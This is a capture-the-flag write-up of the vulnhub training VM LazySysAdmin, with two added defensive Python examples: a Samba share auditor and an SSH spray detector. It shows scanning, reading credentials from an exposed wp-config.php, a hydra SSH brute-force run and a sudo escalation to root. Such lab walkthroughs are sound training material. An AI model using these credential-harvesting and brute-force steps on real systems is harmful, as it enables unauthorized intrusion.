Penetration Test Training – LazySysAdmin: 1 (vanilla style)

Today we’re going to start our training session with a fairly decent image from vulnhub.com: LazySysAdmin: 1.
To use this image, just download, unzip and throw it against a running virtualbox.

Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP address via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

If you want to install these tools with Homebrew, just tap feffi/homebrew-pentest:

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
 Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
 _________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------
 192.168.60.2    08:00:27:6d:95:4e   1      60    Unknown vendor

Ah, right, 192.168.60.2, that’s fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:

$ export ip="192.168.60.2"
$ echo $ip

Nice, let’s start with a common service scan:

$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for 192.168.60.2
Host is up (1.0s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.60.1
|_  error: Closing link: (nmap@192.168.60.1) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the account guest is authenticated as user, that is nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt

Let’s chat…

Having a look at the IRC daemon …

$ telnet 192.168.60.2 6667

Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname... 

>>PASS none

:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead.

>>NICK Bla
>>USER blah blah blah blah

:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network Bla!blah@192.168.56.1
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for 192.168.60.2
Host is up (0.00054s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.60.2\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.60.2\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\192.168.60.2\share$:
|     Type: STYPE_DISKTREE
|     Comment: Sumshare
|     Users: 0
|     Max Users: 
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Oh, nice! A guest writeable directory. Maybe we can snoop around…

$ mkdir share
$ mount_smbfs //guest:@192.168.60.2/share$ share
$ cd share
$ tree -L 2 .
.
├── Backnode_files
│   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp

Really? A wordpress installation! Let us check this first.

$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser

Done. So we got some stuff here, but where to put it?
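The finding in this section comes down to one Samba share that is both guest-accessible and mapped onto the web root. The following check is an added example, not part of the original walkthrough: it audits smb.conf-style text for exactly that combination. The sample config is constructed from the scan output above (the VM's real smb.conf is not shown on this page), and the `WEB_ROOTS` list and function names are assumptions.

```python
import posixpath
TRUE = {"yes", "true", "1"}              # Samba boolean spellings
WEB_ROOTS = ("/var/www", "/srv/www")     # assumed web roots; adjust per host

# Constructed sample modelled on the scan output above, not the VM's real file.
SAMPLE = """
[docs]
   path = /srv/docs
   guest ok = yes
   read only = yes
[share$]
   path = /var/www/html/
   guest ok = yes
   read only = no
"""

def parse_smb_conf(text):
    """Return {section: {key: value}}; keys lowercased with spaces removed."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = shares.setdefault(line[1:-1].strip(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current["".join(key.lower().split())] = value.strip()
    return shares

def flag(params, names, default=False):
    """Read a boolean parameter under any of its synonyms."""
    for name in names:
        if name in params:
            return params[name].lower() in TRUE
    return default

def risky_shares(text):
    """Guest shares that are writable or in a web root (ignores [global] defaults)."""
    findings = []
    for name, p in parse_smb_conf(text).items():
        writable = (not flag(p, ("readonly",), True)
                    or flag(p, ("writeable", "writable", "writeok")))
        path = posixpath.normpath(p.get("path", ""))
        in_web = any(path == r or path.startswith(r + "/") for r in WEB_ROOTS)
        guest = name.lower() != "global" and flag(p, ("guestok", "public"))
        if guest and (writable or in_web):
            findings.append((name, path, writable, in_web))
    return findings
```

Each finding is a tuple of share name, normalised path, writable flag and web-root flag; a read-only guest share outside the web root, like `[docs]` in the sample, is not reported.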

Land of the Apache

Maybe we should enumerate a little further. We’ve got a website listening on port 80. Spider that:

$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://192.168.60.2/apache/
+ http://192.168.60.2/index.html (CODE:200|SIZE:36072)
+ http://192.168.60.2/info.php (CODE:200|SIZE:77236)
==> DIRECTORY: http://192.168.60.2/javascript/
==> DIRECTORY: http://192.168.60.2/old/
==> DIRECTORY: http://192.168.60.2/phpmyadmin/
+ http://192.168.60.2/robots.txt (CODE:200|SIZE:92)
+ http://192.168.60.2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.60.2/test/
==> DIRECTORY: http://192.168.60.2/wordpress/
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)

OK, while dirb is still running we already have some interesting directories to look at:

  • http://192.168.60.2/apache/
  • http://192.168.60.2/info.php
  • http://192.168.60.2/phpmyadmin/
  • http://192.168.60.2/wordpress/

And some more. We’ve already seen those in the samba-enumeration. Let’s try our wordpress then…

$ curl -v http://192.168.60.2/wordpress/
...
 
My name is togie.
My name is togie.
My name is togie.
My name is togie.
...

mhhh that togie again…mhhh, maybe…we can try ssh…

Serpentine water monster

Let us try our already filled login list:

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active

[22][ssh] host: 192.168.60.2   login: togie   password: 12345

1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-04 20:36:42

Nice! So we log in using togie and password 12345:

$ ssh togie@$ip
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #
##################################################################################################

togie@192.168.60.2's password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 192.168.60.2
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We got sudo…
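Seen from the target, the hydra run in this section is a burst of failed SSH logins for many usernames from one address, followed by a success. The following detection is an added example, not part of the original walkthrough: it flags that pattern in OpenSSH auth.log lines. The log lines are constructed (the VM's logs are not shown on this page), and the thresholds, the second source address and the user `alice` are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH auth.log format; not taken from the VM.
SAMPLE_LOG = """\
Nov  5 06:35:24 LazySysAdmin sshd[1501]: Failed password for invalid user TR2 from 192.168.60.1 port 50122 ssh2
Nov  5 06:35:25 LazySysAdmin sshd[1502]: Failed password for invalid user guest from 192.168.60.1 port 50123 ssh2
Nov  5 06:35:27 LazySysAdmin sshd[1503]: Failed password for invalid user Admin from 192.168.60.1 port 50124 ssh2
Nov  5 06:35:28 LazySysAdmin sshd[1504]: Failed password for invalid user deets from 192.168.60.1 port 50125 ssh2
Nov  5 06:36:10 LazySysAdmin sshd[1590]: Failed password for togie from 192.168.60.1 port 50211 ssh2
Nov  5 06:36:12 LazySysAdmin sshd[1591]: Failed password for togie from 192.168.60.1 port 50212 ssh2
Nov  5 06:36:40 LazySysAdmin sshd[1622]: Accepted password for togie from 192.168.60.1 port 50240 ssh2
Nov  5 09:01:02 LazySysAdmin sshd[2001]: Failed password for alice from 192.168.60.50 port 40100 ssh2
Nov  5 09:01:09 LazySysAdmin sshd[2001]: Accepted password for alice from 192.168.60.50 port 40100 ssh2
"""

LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_spray(log, min_failures=5, min_users=3):
    """Flag sources failing against many usernames; record any later success."""
    state = defaultdict(lambda: {"failures": 0, "users": set(), "breached": []})
    for line in log.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        s = state[m["ip"]]
        if m["result"] == "Failed":
            s["failures"] += 1
            s["users"].add(m["user"])
        elif s["failures"] >= min_failures and len(s["users"]) >= min_users:
            # A success after a guessing run is the event to escalate.
            s["breached"].append(m["user"])
    return {ip: s for ip, s in state.items()
            if s["failures"] >= min_failures and len(s["users"]) >= min_users}
```

A single mistyped password followed by a normal login, as with the second source in the sample, stays below both thresholds and is not reported.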

Flag

$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt

Gotcha!

$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learned a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

 

Kevin Wennemuth

I’m on the hunt for disruptive technologies. Architect, security specialist, DevSecOps, think tank, leading-edge IT concepts. ’nuff said.

Martin Riedel

Martin is a passionate developer with focus on the jvm-ecosystem.
Besides that, he’s an avid linux user, python adept and infosec enthusiast.
